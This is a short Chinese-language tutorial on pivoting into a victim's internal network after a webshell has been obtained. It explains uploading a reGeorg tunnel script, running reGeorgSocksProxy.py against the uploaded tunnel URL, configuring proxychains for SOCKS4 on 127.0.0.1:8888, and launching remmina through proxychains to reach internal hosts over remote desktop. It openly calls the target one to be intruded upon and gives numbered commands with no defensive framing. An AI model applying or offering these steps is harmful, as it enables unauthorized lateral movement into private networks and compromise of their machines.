主要使用场景:
已经拿到目标服务器的webshell了,而且目标也开启3389等远程端口,但是用的是反向代理,内网IP,无法远程过去。
所以,你需要通过上传一个aspx或者php等之类的代理脚本(reGeorgSocksProxy),然后通过脚本,把目标电脑开启代理,使用proxychains设置本地代理,然后使用ssh或者远程登陆工具,连接对方电脑,就像连接本地内网一样,例如:要入侵的目标在对方内网的IP是192.168.12.11,那么,我们使用proxychains代理了以后,直接使用远程链接工具链接192.168.12.11即可。代理方式为socks4哦….
1.先安装proxychains:sudo dpkg -i proxychains #如果没有这个包,可以用这个命令下载 sudo apt-get download proxychains 便于以后在其他linux上安装。
2.安装好以后配置proxychains.conf文件:sudo vi /etc/proxychains.conf
3.修改strict_chain为dynamic_chain:直接把strict_chain注释掉,然后把dynamic_chain取消注释 #一共三种代理模式,一个是动态,随机和严谨型,这里选择动态。
4.在配置文件的最后几行找到关键字[ProxyList],并在下面添加或修改socks4 127.0.0.1 8888
5.保存后退出
6.在命令行运行reGeorgSocksProxy.py,通过url开启socks4代理的一个工具:~$python reGeorgSocksProxy.py -u http://www.xxx.com/tunnel.aspx #即把目标机器作为代理
7.在命令行使用代理方法:~$proxychains remmina #通过proxychains启动remmina的代理,remmina为linux下的远程链接windows工具,通过此方法连接远程的内网了。